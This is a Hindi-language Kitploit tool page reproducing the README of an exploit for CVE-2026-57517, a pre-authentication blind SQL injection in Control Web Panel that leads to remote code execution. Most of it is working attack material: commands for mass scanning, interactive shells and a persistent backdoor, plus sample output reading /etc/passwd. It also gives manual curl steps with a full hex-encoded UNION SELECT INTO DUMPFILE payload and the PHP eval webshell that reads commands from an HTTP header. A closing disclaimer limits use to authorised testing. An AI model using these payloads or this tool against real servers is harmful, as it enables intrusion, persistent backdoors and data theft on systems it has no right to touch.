Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/shinthink/cve-2026-57517
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubshinthink/cve-2026-57517

CVE-2026-57517

💉 Blind SQL Injection → RCE exploit के लिए Control Web Panel (CWP) ≤ 0.9.8.1224 — userRes POST → INTO DUMPFILE → cwpsvc shell

रिपॉजिटरी देखें
1122 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-57517 — Control Web Panel Blind SQLi → RCE

Python CVE CVSS लाइसेंस

Control Web Panel ≤ 0.9.8.1224 — ब्लाइंड SQL इंजेक्शन से रिमोट कोड एक्ज़ीक्यूशन

पोर्ट 2083 → userRes POST → INTO DUMPFILE → पोर्ट 2031 वेबशेल → cwpsvc



🔴 भेद्यता अवलोकन

CVE-2026-57517 Control Web Panel (CWP) संस्करण ≤ 0.9.8.1224 में एक महत्वपूर्ण प्री-प्रमाणीकरण ब्लाइंड SQL इंजेक्शन है। उपयोगकर्ता पैनल एंडपॉइंट पर POST पैरामीटर को SQL क्वेरी में एम्बेड करने से पहले स्वच्छ नहीं किया जाता। क्वेरियाँ विशेषाधिकारों के साथ निष्पादित होती हैं — जिसके पास वैश्विक विशेषाधिकार है — जो हमलावरों को के माध्यम से मनमानी फ़ाइलें लिखने की अनुमति देता है।

userRes
MySQL रूट
FILE
INTO DUMPFILE

विशिष्ट शोषण श्रृंखला वेब-सुलभ Roundcube लॉग निर्देशिका में एक PHP वेबशेल तैनात करती है, जो cwpsvc सेवा खाते के रूप में रिमोट कोड निष्पादन प्राप्त करती है।

फ़ील्डविवरण
CVECVE-2026-57517
CVSS9.8 (क्रिटिकल) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
प्रकारCWE-89 — ब्लाइंड SQL इंजेक्शन (प्री-प्रमाणीकरण)
प्रभावितControl Web Panel ≤ 0.9.8.1224
ठीकसंस्करण 0.9.8.1225
प्रकटीकरण1 जुलाई, 2026
शोधकर्ताEgidio Romano (Karma In Security)
PoCसार्वजनिक — KIS-2026-12

📦 स्थापना

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-57517.git
cd CVE-2026-57517
pip install -r requirements.txt

📖 उपयोग

root@kitploit:~
# एकल लक्ष्य (स्वचालित रूप से उपयोगकर्ता नाम पता लगाएं)
python cve_2026_57517.py -t 192.168.1.100

# ज्ञात उपयोगकर्ता नाम के साथ एकल लक्ष्य
python cve_2026_57517.py -t 192.168.1.100 -u cwpsvc

# सामूहिक स्कैन
python cve_2026_57517.py -f targets.txt -o live.txt

# इंटरैक्टिव शेल
python cve_2026_57517.py -t target.com --rce -u cwpsvc

# स्थायी बैकडोर (कोई स्वचालित सफाई नहीं)
python cve_2026_57517.py -t target.com --no-cleanup
root@kitploit:~
  -t, --target      एकल लक्ष्य होस्ट
  -f, --file        लक्ष्यों वाली फ़ाइल (प्रति पंक्ति एक)
  -u, --username    CWP उपयोगकर्ता नाम (स्वचालित पहचान छोड़ता है)
  -o, --output      लाइव TXT आउटपुट फ़ाइल
  --json            JSON रिपोर्ट फ़ाइल
  --threads         समवर्ती कार्यकर्ता (डिफ़ॉल्ट: 20)
  --timeout         अनुरोध टाइमआउट सेकंड (डिफ़ॉल्ट: 15)
  --no-cleanup      लक्ष्य पर शेल छोड़ें
  --rce             इंटरैक्टिव शेल मोड
  -v, --verbose     विस्तृत आउटपुट

🧪 प्रमाण की अवधारणा

परिदृश्य 1: सामूहिक स्कैन

root@kitploit:~
$ python cve_2026_57517.py -f targets.txt -o live.txt -v
root@kitploit:~
────────────────────────────────────────────────────────────
  CVE-2026-57517 | 5 लक्ष्य | 20 थ्रेड
  सफाई: हाँ
  लाइव TXT: live.txt
────────────────────────────────────────────────────────────

  ✅ 192.168.10.100:2083  [rce_confirmed]  18.2s
     उपयोगकर्ता  : admin
     शेल : https://192.168.10.100:2031/roundcube/logs/cwp_a3f2b9c1d8e4.php
     RCE   : uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)
             cwp-prod-01.example.com
     whoami: cwpsvc

  ⚠️ 192.168.10.200:2083  [sqli_failed]  12.1s
     उपयोगकर्ता  : cwpsvc
     त्रुटि : SQL इंजेक्शन विफल — लक्ष्य पैच किया जा सकता है या पथ लिखने योग्य नहीं

  · 192.168.10.50:2083  [not_cwp]  2.3s

==================================================
  स्कैन सारांश
==================================================
  कुल      : 5
  ✅ RCE      : 2
  ⚠️  SQLi विफल : 1
  🔍 कोई उपयोगकर्ता नहीं  : 1
  ·  CWP नहीं  : 1
==================================================

परिदृश्य 2: इंटरैक्टिव शेल

root@kitploit:~
$ python cve_2026_57517.py -t target.com --rce -u admin
root@kitploit:~
  CWP इंटरैक्टिव शेल — target.com
  बाहर निकलने के लिए 'exit' टाइप करें, शेल हटाने के लिए 'cleanup'

cwp$ id
uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)

cwp$ hostname
cwp-prod-01

cwp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
cwpsvc:x:1001:1001::/home/cwpsvc:/bin/bash

cwp$ exit

परिदृश्य 3: मैन्युअल पुनरुत्पादन (curl)

चरण 1 — सत्यापित करें कि CWP पोर्ट 2083 पर पहुंच योग्य है

root@kitploit:~
curl -sk 'https://target.com:2083/' | grep -i 'control web panel\|CWP'

चरण 2 — उपयोगकर्ता नाम मान्य करें

root@kitploit:~
curl -sk -o /dev/null -w "%{http_code}" 'https://target.com:2083/admin/'
# 200 = उपयोगकर्ता मौजूद है

चरण 3 — userRes के माध्यम से SQL इंजेक्शन

पेलोड INTO DUMPFILE के माध्यम से लिखे गए हेक्स-एन्कोडेड PHP शेल के साथ 13-कॉलम UNION SELECT का उपयोग करता है:

root@kitploit:~
" UNION SELECT 1,0x{HEX_PHP_SHELL},3,4,5,6,7,8,9,10,11,12,13
INTO DUMPFILE '/usr/local/cwpsrv/var/services/roundcube/logs/shell.php' #
root@kitploit:~
# उपकरण स्वचालित रूप से हेक्स एन्कोडिंग संभालता है। मैन्युअल समतुल्य:
PAYLOAD='" UNION SELECT 1,0x3c3f706870206576616c286261736536345f6465636f646528245f5345525645525b22485454505f43225d29293b203f3e,3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE '\''/usr/local/cwpsrv/var/services/roundcube/logs/shell.php'\'' #'

curl -sk 'https://target.com:2083/admin/' \
  -d "userRes=$PAYLOAD"

चरण 4 — वेबशेल के माध्यम से कमांड निष्पादित करें (पोर्ट 2031)

तैनात PHP शेल C: HTTP हेडर से कमांड पढ़ता है:

root@kitploit:~
<?php eval(base64_decode($_SERVER['HTTP_C'])); ?>
root@kitploit:~
# Base64-encode: print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';
PHP=$(echo "print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';" | base64 -w0)

curl -sk 'https://target.com:2031/roundcube/logs/shell.php' -H "C: $PHP"
# uid=1001(cwpsvc) gid=1001(cwpsvc)

पेलोड विवरण

घटकमान
SQL कॉलम13-कॉलम UNION SELECT
PHP शेल<?php eval(base64_decode($_SERVER['HTTP_C'])); ?>
हेक्स एन्कोडिंगMySQL 0x... हेक्स लिटरल
लेखन विधिINTO DUMPFILE (बाइनरी-सटीक फ़ाइल लेखन)
लक्ष्य पथ/usr/local/cwpsrv/var/services/roundcube/logs/{uniqid}.php
कमांड वितरणबेस64-एन्कोडेड PHP के साथ HTTP हेडर C:
कमांड निष्पादकpassthru(base64_decode('{cmd}'))

⚠️ अस्वीकरण

🚨 केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए

यह सॉफ़्टवेयर केवल शैक्षिक उद्देश्यों और वैध सुरक्षा अनुसंधान के लिए प्रदान किया गया है। इसका उपयोग निम्नलिखित द्वारा किए जाने का इरादा है:

  • 🛡️ सुरक्षा पेशेवर अधिकृत प्रवेश परीक्षण आयोजित कर रहे हैं
  • 🏢 संगठन अपने स्वयं के CWP बुनियादी ढांचे का ऑडिट कर रहे हैं
  • 🔬 शोधकर्ता भेद्यता शोषण तकनीकों का अध्ययन कर रहे हैं
  • 🎓 छात्र वेब एप्लिकेशन सुरक्षा के बारे में सीख रहे हैं

❌ आप इस सॉफ़्टवेयर का उपयोग निम्नलिखित के लिए नहीं कर सकते:

  • स्पष्ट लिखित प्राधिकरण के बिना कंप्यूटर सिस्टम तक पहुँचना
  • उन सिस्टम से समझौता करना, क्षति पहुँचाना या बाधित करना जिनके आप मालिक नहीं हैं
  • किसी भी प्रकार की अवैध गतिविधि में संलग्न होना

⚖️ कानूनी सूचना

कंप्यूटर सिस्टम तक अनधिकृत पहुँच कानूनों का उल्लंघन करती है जिनमें शामिल हैं लेकिन इन्हीं तक सीमित नहीं:

  • संयुक्त राज्य अमेरिका: कंप्यूटर धोखाधड़ी और दुरुपयोग अधिनियम (18 U.S.C. § 1030)
  • इंडोनेशिया: UU ITE धारा 30 और 46 (UU संख्या 11 वर्ष 2008 जो. UU संख्या 1 वर्ष 2024)
  • यूरोपीय संघ: निर्देश 2013/40/EU
  • यूनाइटेड किंगडम: कंप्यूटर दुरुपयोग अधिनियम 1990

लेखक इस उपकरण के उपयोग से उत्पन्न किसी भी दुरुपयोग, क्षति या कानूनी परिणामों के लिए कोई दायित्व नहीं मानते हैं। इस सॉफ़्टवेयर का उपयोग करके, आप स्वीकार करते हैं कि आप अपने कार्यों के लिए पूरी तरह से जिम्मेदार हैं और सभी लागू कानूनों का पालन करने के लिए सहमत हैं।


📚 संदर्भ

संसाधनलिंक
Karma In Security सलाहKIS-2026-12
मूल PoCCVE-2026-57517.php
पूर्ण प्रकटीकरणSecLists
OpenCVECVE-2026-57517
CWP परिवर्तन लॉगcontrol-webpanel.com

⚡ सुरक्षा अनुसंधान और शिक्षा के लिए निर्मित ⚡

यह परियोजना Control Web Panel या Apache Software Foundation से संबद्ध नहीं है।

टूल डाउनलोड करें